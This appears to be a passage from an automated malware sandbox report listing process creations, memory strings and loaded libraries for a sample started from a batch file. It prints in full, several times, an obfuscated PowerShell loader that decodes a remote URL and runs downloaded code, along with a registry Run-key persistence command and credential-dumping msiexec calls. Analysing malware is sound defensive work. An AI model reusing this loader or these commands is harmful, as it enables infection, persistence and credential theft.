Source: msiexec.exe, 00000009.00000002.3056539906.00000000227A0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 0000000D.00000002.2428825270.0000000004685000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKU_0001710-1-2024-SX-3762.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTria
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,ms
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTria Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
